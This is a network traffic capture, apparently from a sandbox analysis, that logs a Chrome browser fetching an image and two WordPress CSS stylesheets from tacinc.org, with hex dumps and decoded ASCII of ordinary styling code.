                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614814
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5afd87a46d8-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC202INData Raw: 52 49 46 46 c2 00 00 00 57 45 42 50 56 50 38 4c b6 00 00 00 2f 27 c0 09 10 67 10 11 04 d9 b6 a9 23 14 61 06 8f 09 1e c0 4d 6c db ae 72 c8 d0 e5 d4 7d 49 af ff 48 40 c2 97 40 ec b3 04 d0 90 e1 9a 02 ee 3b 87 60 20 a2 ff 0c db b6 0d e3 b6 e3 01 da 15 f8 e1 29 a8 b5 5f 0b 99 58 58 e6 80 a3 55 f8 4e 56 03 16 96 71 cd 4a 40 fd f6 84 3b 04 1c 52 8f 30 42 18 43 25 50 19 44 0a 91 13 29 88 54 38 15 63 a7 44 0b ec cc ca 7a 27 b3 81 5c 30 b3 65 4e 3b ba 79 44 af 85 43 65 ad 3b 64 56 8f c8 ea 90 f5 3d a2 3e 45 f4 da 3b 54 d6 e4 e1 11 bd 0e 8e 28 ab 20 ca aa 38 be 7b 51 fc ff 5c 02 38 25 20 49 01 4e 8a ff 1e 00
                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8L/'g#aMlr}IH@@;` )_XXUNVqJ@;R0BC%PD)T8cDz'\0eN;yDCe;dV=>E;T( 8{Q\8% IN


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              21192.168.2.649746141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC601OUTGET /wp-content/uploads/hummingbird-assets/734068639650f4963a14da140b3e84b8.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:02 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:46 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f2-3d19"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614814
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5b238dc2e6a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC891INData Raw: 33 64 31 39 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 6d 65 64 69 61 65 6c 65 6d 65 6e 74 2c 77 70 2d 6d 65 64 69 61 65 6c 65 6d 65 6e 74 2a 2a 2f 0d 0a 2e 6d 65 6a 73 2d 6f 66 66 73 63 72 65 65 6e 7b 62 6f 72 64 65 72 3a 30 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 69 6e 73 65 74 28 35 30 25 29 3b 63 6c 69 70 2d 70 61 74 68 3a 69 6e 73 65 74 28 35 30 25 29 3b 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 2e 6d 65 6a 73 2d 63 6f 6e
                                                                                                                                                                                                                              Data Ascii: 3d19/**handles:mediaelement,wp-mediaelement**/.mejs-offscreen{border:0;clip:rect(1px,1px,1px,1px);-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal}.mejs-con
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 6e 74 61 69 6e 65 72 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 6d 65 6a 73 2d 69 66 72 61 6d 65 2d 6f 76 65 72 6c 61 79 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 65 6a 73 2d 65 6d 62 65 64 2c 2e 6d 65 6a 73 2d 65 6d 62 65 64 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 65 6a 73 2d 66 75 6c 6c 73 63 72 65 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 2d 66 75 6c 6c
                                                                                                                                                                                                                              Data Ascii: ntainer:focus{outline:none}.mejs-iframe-overlay{height:100%;position:absolute;width:100%}.mejs-embed,.mejs-embed body{background:#000;height:100%;margin:0;overflow:hidden;padding:0;width:100%}.mejs-fullscreen{overflow:hidden!important}.mejs-container-full
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 73 69 74 69 6f 6e 3a 2d 38 30 70 78 20 2d 33 39 70 78 7d 2e 6d 65 6a 73 2d 6f 76 65 72 6c 61 79 2d 6c 6f 61 64 69 6e 67 7b 68 65 69 67 68 74 3a 38 30 70 78 3b 77 69 64 74 68 3a 38 30 70 78 7d 2e 6d 65 6a 73 2d 6f 76 65 72 6c 61 79 2d 6c 6f 61 64 69 6e 67 2d 62 67 2d 69 6d 67 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 61 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 61 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 61 63 69 6e 63 2e 6f 72 67 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6d 65 64 69 61 65 6c 65 6d 65 6e 74 2f 6d 65 6a 73 2d 63 6f 6e 74 72 6f 6c 73 2e
                                                                                                                                                                                                                              Data Ascii: sition:-80px -39px}.mejs-overlay-loading{height:80px;width:80px}.mejs-overlay-loading-bg-img{-webkit-animation:a 1s linear infinite;animation:a 1s linear infinite;background:transparent url(https://www.tacinc.org/wp-includes/js/mediaelement/mejs-controls.
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 73 2d 63 6f 6e 74 61 69 6e 65 72 2d 6b 65 79 62 6f 61 72 64 2d 69 6e 61 63 74 69 76 65 20 5b 72 6f 6c 65 3d 73 6c 69 64 65 72 5d 3a 66 6f 63 75 73 2c 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 2d 6b 65 79 62 6f 61 72 64 2d 69 6e 61 63 74 69 76 65 20 61 2c 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 2d 6b 65 79 62 6f 61 72 64 2d 69 6e 61 63 74 69 76 65 20 61 3a 66 6f 63 75 73 2c 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 2d 6b 65 79 62 6f 61 72 64 2d 69 6e 61 63 74 69 76 65 20 62 75 74 74 6f 6e 2c 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 2d 6b 65 79 62 6f 61 72 64 2d 69 6e 61 63 74 69 76 65 20 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 6d 65 6a 73 2d 74 69 6d 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                              Data Ascii: s-container-keyboard-inactive [role=slider]:focus,.mejs-container-keyboard-inactive a,.mejs-container-keyboard-inactive a:focus,.mejs-container-keyboard-inactive button,.mejs-container-keyboard-inactive button:focus{outline:0}.mejs-time{box-sizing:content
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 30 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 34 29 20 37 35 25 2c 74 72 61 6e 73 70 61 72 65 6e 74 20 30 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 35 70 78 20 31 35 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 62 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 7d 74 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 33 30 70 78 20 30 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 62 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 7d 74 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 33 30 70 78 20 30 7d 7d 2e 6d 65 6a 73 2d 74 69 6d 65 2d 6c 6f 61 64 65
                                                                                                                                                                                                                              Data Ascii: 0,hsla(0,0%,100%,.4) 75%,transparent 0,transparent);background-size:15px 15px;width:100%}@-webkit-keyframes b{0%{background-position:0 0}to{background-position:30px 0}}@keyframes b{0%{background-position:0 0}to{background-position:30px 0}}.mejs-time-loade
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 73 6f 6c 69 64 20 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 39 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 68 65 69 67 68 74 3a 31 30 70 78 3b 6c 65 66 74 3a 2d 37 70 78 3b 74 6f 70 3a 2d 34 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 29 3b 77 69 64 74 68 3a 31 30 70 78 7d 2e 6d 65 6a 73 2d 74 69 6d 65 2d 72 61 69 6c 20 2e 6d 65 6a 73 2d 74 69 6d 65 2d 68 61 6e 64 6c 65 2d 63 6f 6e 74 65 6e 74 3a 61 63 74 69 76 65 2c 2e 6d 65 6a 73 2d 74 69 6d 65 2d 72 61 69 6c 20 2e 6d 65 6a 73 2d 74 69 6d 65 2d 68 61 6e 64 6c 65 2d 63 6f 6e 74 65 6e 74 3a 66 6f 63 75 73 2c 2e 6d 65 6a
                                                                                                                                                                                                                              Data Ascii: solid hsla(0,0%,100%,.9);border-radius:50%;height:10px;left:-7px;top:-4px;-webkit-transform:scale(0);-ms-transform:scale(0);transform:scale(0);width:10px}.mejs-time-rail .mejs-time-handle-content:active,.mejs-time-rail .mejs-time-handle-content:focus,.mej
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 34 30 70 78 20 30 7d 2e 6d 65 6a 73 2d 76 6f 6c 75 6d 65 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 6a 73 2d 76 6f 6c 75 6d 65 2d 62 75 74 74 6f 6e 3e 2e 6d 65 6a 73 2d 76 6f 6c 75 6d 65 2d 73 6c 69 64 65 72 7b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 35 30 2c 35 30 2c 35 30 2c 2e 37 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 74 74 6f 6d 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 31 35 70 78 3b 6c 65 66 74 3a 35 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74
                                                                                                                                                                                                                              Data Ascii: kground-position:-40px 0}.mejs-volume-button{position:relative}.mejs-volume-button>.mejs-volume-slider{-webkit-backface-visibility:hidden;background:rgba(50,50,50,.7);border-radius:0;bottom:100%;display:none;height:115px;left:50%;margin:0;position:absolut
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 3a 31 30 30 25 7d 2e 6d 65 6a 73 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 76 6f 6c 75 6d 65 2d 68 61 6e 64 6c 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 6d 65 6a 73 2d 63 61 70 74 69 6f 6e 73 2d 62 75 74 74 6f 6e 2c 2e 6d 65 6a 73 2d 63 68 61 70 74 65 72 73 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 6a 73 2d 63 61 70 74 69 6f 6e 73 2d 62 75 74 74 6f 6e 3e 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 34 30 70 78 20 30 7d 2e 6d 65 6a 73 2d 63 68 61 70 74 65 72 73 2d 62 75 74 74 6f 6e 3e 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 38 30 70 78 20 30 7d 2e 6d 65 6a 73 2d 63 61 70 74 69 6f 6e 73 2d 62 75 74 74 6f 6e 3e 2e 6d 65 6a 73
                                                                                                                                                                                                                              Data Ascii: :100%}.mejs-horizontal-volume-handle{display:none}.mejs-captions-button,.mejs-chapters-button{position:relative}.mejs-captions-button>button{background-position:-140px 0}.mejs-chapters-button>button{background-position:-180px 0}.mejs-captions-button>.mejs
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 72 73 2d 73 65 6c 65 63 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 31 66 38 66 38 7d 2e 6d 65 6a 73 2d 63 61 70 74 69 6f 6e 73 2d 74 72 61 6e 73 6c 61 74 69 6f 6e 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 35 70 78 7d 2e 6d 65 6a 73 2d 63 61 70 74 69 6f 6e 73 2d 6c 61 79 65 72 7b 62 6f 74 74 6f 6d 3a 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 65 66 74 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6d 65 6a 73 2d 63 61 70 74 69 6f 6e 73 2d 6c 61 79 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72
                                                                                                                                                                                                                              Data Ascii: rs-selected{color:#21f8f8}.mejs-captions-translations{font-size:10px;margin:0 0 5px}.mejs-captions-layer{bottom:0;color:#fff;font-size:16px;left:0;line-height:20px;position:absolute;text-align:center}.mejs-captions-layer a{color:#fff;text-decoration:under
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 73 2d 74 69 6d 65 2d 72 61 69 6c 20 2e 6d 65 6a 73 2d 74 69 6d 65 2d 6c 6f 61 64 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 2e 6d 65 6a 73 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6d 65 6a 73 2d 74 69 6d 65 2d 72 61 69 6c 20 2e 6d 65 6a 73 2d 74 69 6d 65 2d 63 75 72 72 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 37 33 61 61 7d 2e 6d 65 6a 73 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6d 65 6a 73 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 76 6f 6c 75 6d 65 2d 73 6c 69 64 65 72 20 2e 6d 65 6a 73 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 76 6f 6c 75 6d 65 2d 74 6f 74 61 6c 2c 2e 6d 65 6a 73 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6d 65 6a 73 2d 74 69 6d 65 2d 72 61 69 6c 20 2e 6d 65 6a 73 2d 74 69 6d 65 2d 74 6f 74 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28
                                                                                                                                                                                                                              Data Ascii: s-time-rail .mejs-time-loaded{background:#fff}.mejs-controls .mejs-time-rail .mejs-time-current{background:#0073aa}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-total,.mejs-controls .mejs-time-rail .mejs-time-total{background:rgba(


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              22192.168.2.649753141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC629OUTGET /wp-content/plugins/socialdriver-framework/includes/page-builder/frontend-assets/css/spb-styles.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:02 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 15:05:16 GMT
                                                                                                                                                                                                                              ETag: W/"66f5782c-3058b"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614814
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5b4bd9ce873-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC890INData Raw: 37 64 64 31 0d 0a 2e 75 69 2d 68 65 6c 70 65 72 2d 72 65 73 65 74 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 75 69 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 75 69 2d 61 63 63 6f 72 64 69 6f 6e 2d 69 63 6f 6e 73 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 6e 6f 73 63 72 6f 6c 6c 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 74 30 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 30 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72
                                                                                                                                                                                                                              Data Ascii: 7dd1.ui-helper-reset{font-family:inherit;font-size:inherit;line-height:inherit}.ui-accordion .ui-accordion-icons{padding:0!important}html.noscroll{position:fixed;overflow-y:scroll;width:100%}.mt0{margin-top:0!important}.mb0{margin-bottom:0!important}.mr
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 6f 76 65 72 6c 61 79 20 2e 73 66 2d 6c 6f 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 6d 61 72 67 69 6e 3a 2d 31 36 70 78 20 30 20 30 20 2d 31 36 70 78 7d 2e 73 66 2d 63 6f 6e 74 61 69 6e 65 72 2d 6f 76 65 72 6c 61 79 2e 6c 6f 61 64 69 6e 67 2d 64 6f 6e 65 20 2e 73 66 2d 6c 6f 61 64 65 72 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 35 73 7d 2e 73 66 2d 63 6f 6e 74 61 69 6e 65 72 2d 6f 76 65 72 6c 61 79 20 2e 73 66 2d 6c 6f 61 64 65 72 20 73 76 67 20 70 61 74 68 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 73 66 2d 63 6f 6e 74 61 69 6e 65 72 2d 62 6c 6f 63 6b 20 2e 73 66 2d 63 6f 6e 74 61 69 6e 65 72 2d 6f 76 65 72 6c 61 79 7b 64 69 73 70 6c
                                                                                                                                                                                                                              Data Ascii: overlay .sf-loader{position:absolute;top:50%;left:50%;margin:-16px 0 0 -16px}.sf-container-overlay.loading-done .sf-loader{opacity:0;transition:opacity .5s}.sf-container-overlay .sf-loader svg path{fill:#fff}.sf-container-block .sf-container-overlay{displ
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 70 62 2d 72 6f 77 5b 64 61 74 61 2d 72 6f 77 2d 68 65 69 67 68 74 3d 77 69 6e 64 6f 77 2d 68 65 69 67 68 74 5d 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 73 70 62 2d 61 73 73 65 74 2d 63 6f 6e 74 65 6e 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 7d 2e 6e 6f 2d 66 6c
                                                                                                                                                                                                                              Data Ascii: pb-row[data-row-height=window-height]{min-height:100vh}.spb-asset-content{max-width:100%;width:100%;position:relative}.spb-column-inner{max-width:100%;margin-left:0!important;margin-right:0!important;background-position:center;background-size:cover}.no-fl
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 2e 73 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 73 70 62 2d 72 6f 77 5b 64 61 74 61 2d 63 6f 6c 2d 76 2d 70 6f 73 3d 63 65 6e 74 65 72 5d 3e 2e 73 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 7b 74 6f 70 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 6c 65 78 62 6f 78 20 2e 73 70 62 2d 72 6f 77 5b 64 61 74 61 2d 63 6f 6c 2d 76 2d 70 6f 73 3d 63 65 6e 74 65 72 5d 3e
                                                                                                                                                                                                                              Data Ascii: .spb_content_element .spb-column-container{padding-left:0;padding-right:0;max-width:100%}.spb-row[data-col-v-pos=center]>.spb_content_element{top:50%;transform:translateY(-50%);-ms-transform:none;position:relative}.flexbox .spb-row[data-col-v-pos=center]>
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 74 5f 65 6c 65 6d 65 6e 74 3e 2e 72 6f 77 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 73 74 72 65 74 63 68 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 72 65 74 63 68 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 73 74 72 65 74 63 68 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 72 65 74 63 68 7d 2e 66 6c 65 78 62 6f 78 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 66 6c 65 78 62 6f 78 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 63 6f 6e 74 61 69 6e 65 72 3e 2e 73 70 62 2d 63 6f
